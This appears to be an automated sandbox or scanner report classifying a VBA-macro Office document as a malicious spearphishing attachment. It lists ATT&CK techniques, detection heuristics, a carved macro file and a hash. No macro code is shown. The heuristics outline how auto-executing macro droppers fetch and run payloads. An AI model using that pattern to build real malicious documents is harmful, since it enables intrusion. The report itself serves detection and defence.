MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is triggered upon opening, and the CreateObject heuristic indicates it's likely attempting to execute code. This pattern is commonly used to download and execute further malicious payloads, hence the classification as a spearphishing attachment.
Heuristics: 6
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54624 bytes |

SHA-256: 9413bff51d5cb02494b214e02ebe23dd44ab1e6b5a1fbc6943f21d4fddd3dae3
Preview script: first 1,000 lines of the extracted script